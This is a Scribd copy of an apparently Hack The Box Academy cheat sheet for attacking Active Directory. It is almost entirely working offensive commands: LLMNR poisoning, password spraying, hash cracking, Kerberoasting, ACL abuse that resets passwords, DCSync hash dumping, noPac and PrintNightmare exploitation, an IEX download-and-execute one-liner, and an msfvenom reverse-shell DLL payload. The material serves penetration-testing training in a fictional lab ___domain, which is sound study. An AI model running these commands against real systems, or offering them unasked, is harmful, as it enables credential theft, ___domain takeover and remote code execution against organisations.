Scribd
Upload
820 views34 pages

Active Directory Enumeration Attacks Module Cheat Sheet HTB

This document provides a cheat sheet of commands that can be used to enumerate and attack an Active Directory environment. It includes commands for initial enumeration of a ___domain from Linux and Windows hosts, capturing LLMNR and NTB-NS traffic, cracking captured hashes, disabling NBT-NS, generating username combinations, and enumerating password policies from Windows and Linux hosts. The commands outlined allow an attacker to discover information about users, credentials, and security configurations within an Active Directory network.

Uploaded by

Lucas Luque
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
820 views34 pages

Active Directory Enumeration Attacks Module Cheat Sheet HTB

This document provides a cheat sheet of commands that can be used to enumerate and attack an Active Directory environment. It includes commands for initial enumeration of a ___domain from Linux and Windows hosts, capturing LLMNR and NTB-NS traffic, cracking captured hashes, disabling NBT-NS, generating username combinations, and enumerating password policies from Windows and Linux hosts. The commands outlined allow an attacker to discover information about users, credentials, and security configurations within an Active Directory network.

Uploaded by

Lucas Luque
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
Download as pdf or txt
Download as pdf or txt
You are on page 1/ 34

ACTIVE DIRECTORY ENUMERATION &

ATTACKS

CHEAT SHEET
Initial Enumeration
Command Description

nslookup ns1.inlanefreight.com Used to query the ___domain name system and


discover the IP address to ___domain name
mapping of the target entered from a Linux-
based host.

sudo tcpdump -i ens224 Used to start capturing network packets on the


network interface proceeding the -i option a
Linux-based host.

sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR,


NBT-NS and MDNS queries on the interface
specified proceeding the -I option and
operating in Passive Analysis mode which is
activated using -A. Performed from a Linux-
based host

fping -asgq 172.16.5.0/23 Performs a ping sweep on the specified network


segment from a Linux-based host.

sudo nmap -v -A -iL hosts.txt -oN Performs an nmap scan that with OS detection,
/home/User/Documents/host-enum version detection, script scanning, and
traceroute enabled (-A) based on a list of hosts
(hosts.txt) specified in the file proceeding -iL.
Then outputs the scan results to the file
specified after the -oNoption. Performed from a
Linux-based host
Command Description

sudo git clone Uses git to clone the kerbrute tool from a Linux-
https://github.com/ropnop/kerbrute.git based host.

make help Used to list compiling options that are possible


with make from a Linux-based host.

sudo make all Used to compile a Kerbrute binary for multiple


OS platforms and CPU architectures.

./kerbrute_linux_amd64 Used to test the chosen complied Kebrute


binary from a Linux-based host.

sudo mv kerbrute_linux_amd64 Used to move the Kerbrute binary to a directory


/usr/local/bin/kerbrute can be set to be in a Linux user's path. Making it
easier to use the tool.

./kerbrute_linux_amd64 userenum -d Runs the Kerbrute tool to discover usernames in


INLANEFREIGHT.LOCAL --dc 172.16.5.5 the ___domain (INLANEFREIGHT.LOCAL) specified
jsmith.txt -o kerb-results
proceeding the -d option and the associated
___domain controller specified proceeding --
dcusing a wordlist and outputs (-o) the results to
a specified file. Performed from a Linux-based
host.

LLMNR/NTB-NS Poisoning
Command Description

responder -h Used to
display the
usage
instructions
and various
options
available in
Responder from
a Linux-based
host.
Command Description

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt Uses hashcat


to crack NTLMv2
(-m) hashes
that were
captured by
responder and
saved in a file
(frond_ntlmv2).
The cracking is
done based on
a specified
wordlist.

Import-Module .\Inveigh.ps1 Using the


Import-Module
PowerShell
cmd-let to
import the
Windows-
based tool
Inveigh.ps1.

(Get-Command Invoke-Inveigh).Parameters Used to output


many of the
options &
functionality
available with
Invoke-
Inveigh.
Peformed from
a Windows-
based host.

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y Starts Inveigh


on a Windows-
based host
with LLMNR &
NBNS
spoofing
enabled and
outputs the
results to a file.
Command Description

.\Inveigh.exe Starts the C#


implementation
of Inveigh from
a Windows-
based host.

$regkey = PowerShell
"HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" script used to
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path
"$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose} disable NBT-
NS on a
Windows host.

Password Spraying & Password Policies


Command Description

#!/bin/bash for x in {{A..Z}, Bash script used to generate 16,079,616 possible


{0..9}}{{A..Z},{0..9}}{{A..Z}, username combinations from a Linux-based host.
{0..9}}{{A..Z},{0..9}} do echo
$x; done

crackmapexec smb 172.16.5.5 -u Uses CrackMapExecand valid credentials


avazquez -p Password123 --pass- (avazquez:Password123) to enumerate the password
pol
policy (--pass-pol) from a Linux-based host.

rpcclient -U "" -N 172.16.5.5 Uses rpcclient to discover information about the


___domain through SMB NULL sessions. Performed from a
Linux-based host.

rpcclient $> querydominfo Uses rpcclient to enumerate the password policy in a


target Windows ___domain from a Linux-based host.

enum4linux -P 172.16.5.5 Uses enum4linux to enumerate the password policy (-


P) in a target Windows ___domain from a Linux-based
host.

enum4linux-ng -P 172.16.5.5 -oA Uses enum4linux-ng to enumerate the password policy


ilfreight (-P) in a target Windows ___domain from a Linux-based
host, then presents the output in YAML & JSON saved
in a file proceeding the -oA option.
Command Description

ldapsearch -h 172.16.5.5 -x -b Uses ldapsearch to enumerate the password policy in


"DC=INLANEFREIGHT,DC=LOCAL" -s a target Windows ___domain from a Linux-based host.
sub "*" | grep -m 1 -B 10
pwdHistoryLength

net accounts Used to enumerate the password policy in a Windows


___domain from a Windows-based host.

Import-Module .\PowerView.ps1 Uses the Import-Module cmd-let to import the


PowerView.ps1 tool from a Windows-based host.

Get-DomainPolicy Used to enumerate the password policy in a target


Windows ___domain from a Windows-based host.

enum4linux -U 172.16.5.5 | grep Uses enum4linux to discover user accounts in a target


"user:" | cut -f2 -d"[" | cut - Windows ___domain, then leverages grep to filter the
f1 -d"]"
output to just display the user from a Linux-based host.

rpcclient -U "" -N 172.16.5.5 Uses rpcclient to discover user accounts in a target


rpcclient $> enumdomuser Windows ___domain from a Linux-based host.

crackmapexec smb 172.16.5.5 -- Uses CrackMapExec to discover users (--users) in a


users target Windows ___domain from a Linux-based host.

ldapsearch -h 172.16.5.5 -x -b Uses ldapsearch to discover users in a target Windows


"DC=INLANEFREIGHT,DC=LOCAL" -s doman, then filters the output using grep to show only
sub "(&(objectclass=user))" |
grep sAMAccountName: | cut -f2 - the sAMAccountName from a Linux-based host.
d" "

./windapsearch.py --dc-ip Uses the python tool windapsearch.py to discover


172.16.5.5 -u "" -U users in a target Windows ___domain from a Linux-based
host.

for u in $(cat Bash one-liner used to perform a password spraying


valid_users.txt);do rpcclient -U attack using rpcclient and a list of users
"$u%Welcome1" -c
"getusername;quit" 172.16.5.5 | (valid_users.txt) from a Linux-based host. It also
grep Authority; done filters out failed attempts to make the output cleaner.

kerbrute passwordspray -d Uses kerbrute and a list of users (valid_users.txt) to


inlanefreight.local --dc perform a password spraying attack against a target
172.16.5.5 valid_users.txt
Welcome1 Windows ___domain from a Linux-based host.
Command Description

sudo crackmapexec smb 172.16.5.5 Uses CrackMapExec and a list of users


-u valid_users.txt -p (valid_users.txt) to perform a password spraying
Password123 | grep +
attack against a target Windows ___domain from a Linux-
based host. It also filters out logon failures using grep.

sudo crackmapexec smb 172.16.5.5 Uses CrackMapExec to validate a set of credentials from
-u avazquez -p Password123 a Linux-based host.

sudo crackmapexec smb --local- Uses CrackMapExec and the --local-auth flag to ensure
auth 172.16.5.0/24 -u only one login attempt is performed from a Linux-
administrator -H
88ad09182de639ccc6579eb0849751cf based host. This is to ensure accounts are not locked
| grep + out by enforced password policies. It also filters out
logon failures using grep.

Import-Module Used to import the PowerShell-based tool


.\DomainPasswordSpray.ps1 DomainPasswordSpray.ps1 from a Windows-based host.

Invoke-DomainPasswordSpray - Performs a password spraying attack and outputs (-


Password Welcome1 -OutFile OutFile) the results to a specified file (spray_success)
spray_success -ErrorAction
SilentlyContinue from a Windows-based host.

Enumerating Security Controls


Command Description

Get-MpComputerStatus PowerShell cmd-let used to check the


status of Windows Defender Anti-Virus
from a Windows-based host.

Get-AppLockerPolicy -Effective | select - PowerShell cmd-let used to view


ExpandProperty RuleCollections AppLocker policies from a Windows-based
host.

$ExecutionContext.SessionState.LanguageMode PowerShell script used to discover the


PowerShell Language Mode being used on
a Windows-based host. Performed from a
Windows-based host.

Find-LAPSDelegatedGroups A LAPSToolkit function that discovers LAPS


Delegated Groups from a Windows-based
host.
Command Description

Find-AdmPwdExtendedRights A LAPSTookit function that checks the


rights on each computer with LAPS
enabled for any groups with read access
and users with All Extended Rights.
Performed from a Windows-based host.

Get-LAPSComputers A LAPSToolkit function that searches for


computers that have LAPS enabled,
discover password expiration and can
discover randomized passwords.
Performed from a Windows-based host.

Credentialed Enumeration
Command Description

xfreerdp /u:[email protected] /p:Klmcargo2 Connects to a Windows target


/v:172.16.5.25 using valid credentials.
Performed from a Linux-based
host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Authenticates with a Windows


Klmcargo2 --users target over smb using valid
credentials and attempts to
discover more users (--users)
in a target Windows ___domain.
Performed from a Linux-based
host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Authenticates with a Windows


Klmcargo2 --groups target over smb using valid
credentials and attempts to
discover groups (--groups) in a
target Windows ___domain.
Performed from a Linux-based
host.
Command Description

sudo crackmapexec smb 172.16.5.125 -u forend -p Authenticates with a Windows


Klmcargo2 --loggedon-users target over smb using valid
credentials and attempts to
check for a list of logged on
users (--loggedon-users) on
the target Windows host.
Performed from a Linux-based
host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Authenticates with a Windows


Klmcargo2 --shares target over smb using valid
credentials and attempts to
discover any smb shares (--
shares). Performed from a
Linux-based host.

sudo crackmapexec smb 172.16.5.5 -u forend -p Authenticates with a Windows


Klmcargo2 -M spider_plus --share Dev-share target over smb using valid
credentials and utilizes the
CrackMapExec module (-M)
spider_plus to go through each
readable share (Dev-share) and
list all readable files. The
results are outputted in JSON.
Performed from a Linux-based
host.

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL Enumerates the target


-H 172.16.5.5 Windows ___domain using valid
credentials and lists shares &
permissions available on each
within the context of the valid
credentials used and the target
Windows host (-H). Performed
from a Linux-based host.

smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL Enumerates the target


-H 172.16.5.5 -R SYSVOL --dir-only Windows ___domain using valid
credentials and performs a
recursive listing (-R) of the
specified share (SYSVOL) and
only outputs a list of directories
(--dir-only) in the share.
Performed from a Linux-based
host.
Command Description

rpcclient $> queryuser 0x457 Enumerates a target user


account in a Windows ___domain
using its relative identifier
(0x457). Performed from a
Linux-based host.

rpcclient $> enumdomusers Discovers user accounts in a


target Windows ___domain and
their associated relative
identifiers (rid). Performed
from a Linux-based host.

psexec.py Impacket tool used to connect


inlanefreight.local/wley:'transporter@4'@172.16.5.125 to the CLI of a Windows target
via the ADMIN$ administrative
share with valid credentials.
Performed from a Linux-based
host.

wmiexec.py Impacket tool used to connect


inlanefreight.local/wley:'transporter@4'@172.16.5.5 to the CLI of a Windows target
via WMI with valid credentials.
Performed from a Linux-based
host.

windapsearch.py -h Used to display the options and


functionality of
windapsearch.py. Performed
from a Linux-based host.

python3 windapsearch.py --dc-ip 172.16.5.5 -u Used to enumerate the ___domain


inlanefreight\wley -p transporter@4 --da admins group (--da) using a
valid set of credentials on a
target Windows ___domain.
Performed from a Linux-based
host.

python3 windapsearch.py --dc-ip 172.16.5.5 -u Used to perform a recursive


inlanefreight\wley -p transporter@4 -PU search (-PU) for users with
nested permissions using valid
credentials. Performed from a
Linux-based host.
Command Description

sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns Executes the python


172.16.5.5 -d inlanefreight.local -c all implementation of BloodHound
(bloodhound.py) with valid
credentials and specifies a
name server (-ns) and target
Windows ___domain
(inlanefreight.local) as well
as runs all checks (-c all).
Runs using valid credentials.
Performed from a Linux-based
host.

Enumeration by Living Off the Land


Command Description

Get-Module PowerShell cmd-let used to list all available


modules, their version and command options from
a Windows-based host.

Import-Module ActiveDirectory Loads the Active Directory PowerShell module


from a Windows-based host.

Get-ADDomain PowerShell cmd-let used to gather Windows


___domain information from a Windows-based host.

Get-ADUser -Filter PowerShell cmd-let used to enumerate user


{ServicePrincipalName -ne "$null"} accounts on a target Windows ___domain and filter by
-Properties ServicePrincipalName
ServicePrincipalName. Performed from a Windows-
based host.

Get-ADTrust -Filter * PowerShell cmd-let used to enumerate any trust


relationships in a target Windows ___domain and filters
by any (-Filter *). Performed from a Windows-
based host.

Get-ADGroup -Filter * | select name PowerShell cmd-let used to enumerate groups in a


target Windows ___domain and filters by the name of
the group (select name). Performed from a
Windows-based host.
Command Description

Get-ADGroup -Identity "Backup PowerShell cmd-let used to search for a specifc


Operators" group (-Identity "Backup Operators"). Performed
from a Windows-based host.

Get-ADGroupMember -Identity "Backup PowerShell cmd-let used to discover the members


Operators" of a specific group (-Identity "Backup
Operators"). Performed from a Windows-based
host.

Export-PowerViewCSV PowerView script used to append results to a CSV


file. Performed from a Windows-based host.

ConvertTo-SID PowerView script used to convert a User or Group


name to it's SID. Performed from a Windows-based
host.

Get-DomainSPNTicket PowerView script used to request the kerberos


ticket for a specified service principal name (SPN).
Performed from a Windows-based host.

Get-Domain PowerView script used tol return the AD object for


the current (or specified) ___domain. Performed from a
Windows-based host.

Get-DomainController PowerView script used to return a list of the target


___domain controllers for the specified target ___domain.
Performed from a Windows-based host.

Get-DomainUser PowerView script used to return all users or


specific user objects in AD. Performed from a
Windows-based host.

Get-DomainComputer PowerView script used to return all computers or


specific computer objects in AD. Performed from a
Windows-based host.

Get-DomainGroup PowerView script used to eturn all groups or


specific group objects in AD. Performed from a
Windows-based host.

Get-DomainOU PowerView script used to search for all or specific


OU objects in AD. Performed from a Windows-
based host.
Command Description

Find-InterestingDomainAcl PowerView script used to find object ACLs in the


___domain with modification rights set to non-built in
objects. Performed from a Windows-based host.

Get-DomainGroupMember PowerView script used to return the members of a


specific ___domain group. Performed from a Windows-
based host.

Get-DomainFileServer PowerView script used to return a list of servers


likely functioning as file servers. Performed from a
Windows-based host.

Get-DomainDFSShare PowerView script used to return a list of all


distributed file systems for the current (or specified)
___domain. Performed from a Windows-based host.

Get-DomainGPO PowerView script used to return all GPOs or


specific GPO objects in AD. Performed from a
Windows-based host.

Get-DomainPolicy PowerView script used to return the default ___domain


policy or the ___domain controller policy for the current
___domain. Performed from a Windows-based host.

Get-NetLocalGroup PowerView script used to enumerate local groups


on a local or remote machine. Performed from a
Windows-based host.

Get-NetLocalGroupMember PowerView script enumerate members of a specific


local group. Performed from a Windows-based
host.

Get-NetShare PowerView script used to return a list of open


shares on a local (or a remote) machine.
Performed from a Windows-based host.

Get-NetSession PowerView script used to return session


information for the local (or a remote) machine.
Performed from a Windows-based host.

Test-AdminAccess PowerView script used to test if the current user


has administrative access to the local (or a remote)
machine. Performed from a Windows-based host.
Command Description

Find-DomainUserLocation PowerView script used to find machines where


specific users are logged into. Performed from a
Windows-based host.

Find-DomainShare PowerView script used to find reachable shares on


___domain machines. Performed from a Windows-
based host.

Find-InterestingDomainShareFile PowerView script that searches for files matching


specific criteria on readable shares in the ___domain.
Performed from a Windows-based host.

Find-LocalAdminAccess PowerView script used to find machines on the


local ___domain where the current user has local
administrator access Performed from a Windows-
based host.

Get-DomainTrust PowerView script that returns ___domain trusts for the


current ___domain or a specified ___domain. Performed
from a Windows-based host.

Get-ForestTrust PowerView script that returns all forest trusts for


the current forest or a specified forest. Performed
from a Windows-based host.

Get-DomainForeignUser PowerView script that enumerates users who are in


groups outside of the user's ___domain. Performed
from a Windows-based host.

Get-DomainForeignGroupMember PowerView script that enumerates groups with


users outside of the group's ___domain and returns
each foreign member. Performed from a Windows-
based host.

Get-DomainTrustMapping PowerView script that enumerates all trusts for


current ___domain and any others seen. Performed
from a Windows-based host.

Get-DomainGroupMember -Identity PowerView script used to list all the members of a


"Domain Admins" -Recurse target group ("Domain Admins") through the use of
the recurse option (-Recurse). Performed from a
Windows-based host.
Command Description

Get-DomainUser -SPN -Properties PowerView script used to find users on the target
samaccountname,ServicePrincipalName Windows ___domain that have the Service Principal
Name set. Performed from a Windows-based host.

.\Snaffler.exe -d Runs a tool called Snaffler against a target


INLANEFREIGHT.LOCAL -s -v data Windows ___domain that finds various kinds of data in
shares that the compromised account has access
to. Performed from a Windows-based host.

Transfering Files
Command Description

sudo python3 -m http.server 8001 Starts a python


web server for
quick hosting
of files.
Performed
from a Linux-
basd host.

"IEX(New-Object PowerShell
Net.WebClient).downloadString('http://172.16.5.222/SharpHound.exe')" one-liner used
to download a
file from a web
server.
Performed
from a
Windows-
based host.

impacket-smbserver -ip 172.16.5.x -smb2support -username user - Starts a


password password shared /home/administrator/Downloads/ impacket SMB
server for
quick hosting
of a file.
Performed
from a
Windows-
based host.
Kerberoasting
Command Description

sudo python3 -m pip install . Used to install Impacket


from inside the directory
that gets cloned to the
attack host. Performed
from a Linux-based host.

GetUserSPNs.py -h Impacket tool used to


display the options and
functionality of
GetUserSPNs.py from a
Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 Impacket tool used to get


INLANEFREIGHT.LOCAL/mholliday a list of SPNs on the target
Windows ___domain from a
Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 Impacket tool used to


INLANEFREIGHT.LOCAL/mholliday -request download/request (-
request) all TGS tickets
for offline processing from
a Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 Impacket tool used to


INLANEFREIGHT.LOCAL/mholliday -request-user sqldev download/request (-
request-user) a TGS
ticket for a specific user
account (sqldev) from a
Linux-based host.

GetUserSPNs.py -dc-ip 172.16.5.5 Impacket tool used to


INLANEFREIGHT.LOCAL/mholliday -request-user sqldev - download/request a TGS
outputfile sqldev_tgs
ticket for a specific user
account and write the
ticket to a file (-
outputfile sqldev_tgs)
linux-based host.
Command Description

hashcat -m 13100 sqldev_tgs Attempts to crack the


/usr/share/wordlists/rockyou.txt --force Kerberos (-m 13100) ticket
hash (sqldev_tgs) using
hashcat and a wordlist
(rockyou.txt) from a
Linux-based host.

setspn.exe -Q */* Used to enumerate SPNs


in a target Windows
___domain from a Windows-
based host.

Add-Type -AssemblyName System.IdentityModel New-Object PowerShell script used to


System.IdentityModel.Tokens.KerberosRequestorSecurityToken download/request the
-ArgumentList "MSSQLSvc/DEV-PRE-
SQL.inlanefreight.local:1433" TGS ticket of a specific
user from a Windows-
based host.

setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String Used to download/request


'^CN' -Context 0,1 | % { New-Object all TGS tickets from a
System.IdentityModel.Tokens.KerberosRequestorSecurityToken
-ArgumentList $_.Context.PostContext[0].Trim() } WIndows-based host.

mimikatz # base64 /out:true Mimikatz command that


ensures TGS tickets are
extracted in base64 format
from a Windows-based
host.

kerberos::list /export Mimikatz command used


to extract the TGS tickets
from a Windows-based
host.

echo "<base64 blob>" | tr -d \\n Used to prepare the


base64 formatted TGS
ticket for cracking from
Linux-based host.

cat encoded_file | base64 -d > sqldev.kirbi Used to output a file


(encoded_file) into a .kirbi
file in base64 (base64 -d
> sqldev.kirbi) format
from a Linux-based host.
Command Description

python2.7 kirbi2john.py sqldev.kirbi Used to extract the


Kerberos ticket. This
also creates a file called
crack_file from a Linux-
based host.

sed 's/\$krb5tgs\$\(.*\):\ Used to modify the


(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > crack_file for Hashcat
sqldev_tgs_hashcat
from a Linux-based host.

cat sqldev_tgs_hashcat Used to view the prepared


hash from a Linux-based
host.

hashcat -m 13100 sqldev_tgs_hashcat Used to crack the


/usr/share/wordlists/rockyou.txt prepared Kerberos ticket
hash
(sqldev_tgs_hashcat)
using a wordlist
(rockyou.txt) from a
Linux-based host.

Import-Module .\PowerView.ps1 Get-DomainUser * -spn | Uses PowerView tool to


select samaccountname extract TGS Tickets .
Performed from a
Windows-based host.

Get-DomainUser -Identity sqldev | Get-DomainSPNTicket - PowerView tool used to


Format Hashcat download/request the
TGS ticket of a specific
ticket and automatically
format it for Hashcat from
a Windows-based host.

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Exports all TGS tickets to


Hashcat | Export-Csv .\ilfreight_tgs.csv - a .CSV file
NoTypeInformation
(ilfreight_tgs.csv) from
a Windows-based host.

cat .\ilfreight_tgs.csv Used to view the contents


of the .csv file from a
Windows-based host.
Command Description

.\Rubeus.exe Used to view the options


and functionality possible
with the tool Rubeus.
Performed from a
Windows-based host.

.\Rubeus.exe kerberoast /stats Used to check the


kerberoast stats (/stats)
within the target Windows
___domain from a Windows-
based host.

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap Used to request/download


TGS tickets for accounts
with the admin count set to
1 then formats the output
in an easy to view & crack
manner (/nowrap) .
Performed from a
Windows-based host.

.\Rubeus.exe kerberoast /user:testspn /nowrap Used to request/download


a TGS ticket for a specific
user (/user:testspn) the
formats the output in an
easy to view & crack
manner (/nowrap).
Performed from a
Windows-based host.

Get-DomainUser testspn -Properties PowerView tool used to


samaccountname,serviceprincipalname,msds- check the msDS-
supportedencryptiontypes SupportedEncryptionType
attribute associated with a
specific user account
(testspn). Performed from
a Windows-based host.

hashcat -m 13100 rc4_to_crack Used to attempt to crack


/usr/share/wordlists/rockyou.txt the ticket hash using a
wordlist (rockyou.txt)
from a Linux-based host .

ACL Enumeration & Tactics


Command Description

Find-InterestingDomainAcl PowerView tool


used to find object
ACLs in the target
Windows ___domain
with modification
rights set to non-
built in objects from
a Windows-based
host.

Import-Module .\PowerView.ps1 $sid = Convert-NameToSid wley Used to import


PowerView and
retrieve the SID of a
specific user
account (wley) from
a Windows-based
host.

Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq Used to find all


$sid} Windows ___domain
objects that the user
has rights over by
mapping the user's
SID to the
SecurityIdentifier
property from a
Windows-based
host.

$guid= "00299570-246d-11d0-a768-00aa006e0529" Get-ADObject - Used to perform a


SearchBase "CN=Extended-Rights,$((Get- reverse search &
ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -
like 'ControlAccessRight'} -Properties * | Select map to a GUID value
Name,DisplayName,DistinguishedName,rightsGuid | ?{$_.rightsGuid from a Windows-
-eq $guid} | fl based host.

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? Used to discover a


{$_.SecurityIdentifier -eq $sid} ___domain object's ACL
by performing a
search based on
GUID's (-
ResolveGUIDs) from
a Windows-based
host.
Command Description

Get-ADUser -Filter * | Select-Object -ExpandProperty Used to discover a


SamAccountName > ad_users.txt group of user
accounts in a target
Windows ___domain
and add the output
to a text file
(ad_users.txt) from
a Windows-based
host.

foreach($line in [System.IO.File]::ReadLines("C:\Users\htb- A foreach loop used


student\Desktop\ad_users.txt")) {get-acl "AD:\$(Get-ADUser to retrieve ACL
$line)" | Select-Object Path -ExpandProperty Access | Where-
Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}} information for each
___domain user in a
target Windows
___domain by feeding
each list of a text
file(ad_users.txt) to
the Get-ADUser
cmdlet, then
enumerates access
rights of those
users. Performed
from a Windows-
based host.

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' - Used to create a


AsPlainText -Force $Cred = New-Object PSCredential
System.Management.Automation.PSCredential('INLANEFREIGHT\wley', Object from a
$SecPassword)
Windows-based
host.

$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' - Used to create a


AsPlainText -Force SecureString
Object from a
Windows-based
host.
Command Description

Set-DomainUserPassword -Identity damundsen -AccountPassword PowerView tool


$damundsenPassword -Credential $Cred -Verbose used to change the
password of a
specifc user
(damundsen) on a
target Windows
___domain from a
Windows-based
host.

Get-ADGroup -Identity "Help Desk Level 1" -Properties * | PowerView tool


Select -ExpandProperty Members used view the
members of a target
security group (Help
Desk Level 1) from
a Windows-based
host.

Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members PowerView tool


'damundsen' -Credential $Cred2 -Verbose used to add a
specifc user
(damundsen) to a
specific security
group (Help Desk
Level 1) in a target
Windows ___domain
from a Windows-
based host.

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select PowerView tool


MemberName used to view the
members of a
specific security
group (Help Desk
Level 1) and output
only the username
of each member
(Select MemberName)
of the group from a
Windows-based
host.
Command Description

Set-DomainObject -Credential $Cred2 -Identity adunn -SET PowerView tool


@{serviceprincipalname='notahacker/LEGIT'} -Verbose used create a fake
Service Principal
Name given a sepecift
user (adunn) from a
Windows-based
host.

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear PowerView tool


serviceprincipalname -Verbose used to remove the
fake Service
Principal Name
created during the
attack from a
Windows-based
host.

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members PowerView tool


'damundsen' -Credential $Cred2 -Verbose used to remove a
specific user
(damundsent) from a
specific security
group (Help Desk
Level 1) from a
Windows-based
host.

ConvertFrom-SddlString PowerShell cmd-let


used to covert an
SDDL string into a
readable format.
Performed from a
Windows-based
host.

DCSync
Command Description
Command Description

Get-DomainUser -Identity adunn | select PowerView tool used to view


samaccountname,objectsid,memberof,useraccountcontrol the group membership of a
|fl
specific user (adunn) in a
target Windows ___domain.
Performed from a Windows-
based host.

$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164" Used to create a variable


Get-ObjectAcl "DC=inlanefreight,DC=local" - called SID that is set equal to
ResolveGUIDs | ? { ($_.ObjectAceType -match
'Replication-Get')} | ?{$_.SecurityIdentifier -match the SID of a user account.
$sid} | select AceQualifier, ObjectDN, Then uses PowerView tool
ActiveDirectoryRights,SecurityIdentifier,ObjectAceType Get-ObjectAcl to check a
| fl specific user's replication
rights. Performed from a
Windows-based host.

secretsdump.py -outputfile inlanefreight_hashes -just- Impacket tool sed to extract


dc INLANEFREIGHT/[email protected] -use-vss NTLM hashes from the
NTDS.dit file hosted on a
target Domain Controller
(172.16.5.5) and save the
extracted hashes to an file
(inlanefreight_hashes).
Performed from a Linux-based
host.

mimikatz # lsadump::dcsync /___domain:INLANEFREIGHT.LOCAL Uses Mimikatz to perform a


/user:INLANEFREIGHT\administrator dcsync attack from a
Windows-based host.

Privileged Access
Command Description

Get-NetLocalGroupMember -ComputerName PowerView based tool to used to enumerate


ACADEMY-EA-MS01 -GroupName "Remote the Remote Desktop Users group on a
Desktop Users"
Windows target (-ComputerName ACADEMY-EA-
MS01) from a Windows-based host.
Command Description

Get-NetLocalGroupMember -ComputerName PowerView based tool to used to enumerate


ACADEMY-EA-MS01 -GroupName "Remote the Remote Management Users group on a
Management Users"
Windows target (-ComputerName ACADEMY-EA-
MS01) from a Windows-based host.

$password = ConvertTo-SecureString Creates a variable ($password) set equal to


"Klmcargo2" -AsPlainText -Force the password (Klmcargo2) of a user from a
Windows-based host.

$cred = new-object Creates a variable ($cred) set equal to the


System.Management.Automation.PSCredential username (forend) and password
("INLANEFREIGHT\forend", $password)
($password) of a target ___domain account from
a Windows-based host.

Enter-PSSession -ComputerName ACADEMY-EA- Uses the PowerShell cmd-let Enter-


DB01 -Credential $cred PSSession to establish a PowerShell session
with a target over the network (-
ComputerName ACADEMY-EA-DB01) from a
Windows-based host. Authenticates using
credentials made in the 2 commands shown
prior ($cred & $password).

evil-winrm -i 10.129.201.234 -u forend Used to establish a PowerShell session with


a Windows target from a Linux-based host
using WinRM.

Import-Module .\PowerUpSQL.ps1 Used to import the PowerUpSQL tool.

Get-SQLInstanceDomain PowerUpSQL tool used to enumerate SQL


server instances from a Windows-based
host.

Get-SQLQuery -Verbose -Instance PowerUpSQL tool used to connect to


"172.16.5.150,1433" -username connect to a SQL server and query the
"inlanefreight\damundsen" -password
"SQL1234!" -query 'Select @@version' version (-query 'Select @@version') from a
Windows-based host.

mssqlclient.py Impacket tool used to display the


functionality and options provided with
mssqlclient.py from a Linux-based host.

mssqlclient.py Impacket tool used to connect to a MSSQL


INLANEFREIGHT/[email protected] - server from a Linux-based host.
windows-auth
Command Description

SQL> help Used to display mssqlclient.py options once


connected to a MSSQL server.

SQL> enable_xp_cmdshell Used to enable xp_cmdshell stored


procedure that allows for executing OS
commands via the database from a Linux-
based host.

xp_cmdshell whoami /priv Used to enumerate rights on a system using


xp_cmdshell.

NoPac
Command Description

sudo git clone Used to clone a noPac exploit using git.


https://github.com/Ridter/noPac.git Performed from a Linux-based host.

sudo python3 scanner.py Runs scanner.py to check if a target


inlanefreight.local/forend:Klmcargo2 -dc-ip system is vulnerable to
172.16.5.5 -use-ldap
noPac/Sam_The_Admin from a Linux-based
host.

sudo python3 noPac.py Used to exploit the noPac/Sam_The_Admin


INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip vulnerability and gain a SYSTEM shell (-
172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell -
-impersonate administrator -use-ldap shell). Performed from a Linux-based
host.

sudo python3 noPac.py Used to exploit the noPac/Sam_The_Admin


INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip vulnerability and perform a DCSync attack
172.16.5.5 -dc-host ACADEMY-EA-DC01 --
impersonate administrator -use-ldap -dump - against the built-in Administrator account
just-dc-user INLANEFREIGHT/administrator on a Domain Controller from a Linux-
based host.

PrintNightmare
Command Description
Command Description

git clone https://github.com/cube0x0/CVE- Used to clone a PrintNightmare exploit


2021-1675.git using git from a Linux-based host.

pip3 uninstall impacket git clone Used to ensure the exploit author's
https://github.com/cube0x0/impacket cd (cube0x0) version of Impacket is installed.
impacket python3 ./setup.py install
This also uninstalls any previous
Impacket version on a Linux-based host.

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS- Used to check if a Windows target has


PAR' MS-PAR & MSRPRN exposed from a Linux-
based host.

msfvenom -p Used to generate a DLL payload to be


windows/x64/meterpreter/reverse_tcp used by the exploit to gain a shell
LHOST=10.129.202.111 LPORT=8080 -f dll >
backupscript.dll session. Performed from a Windows-
based host.

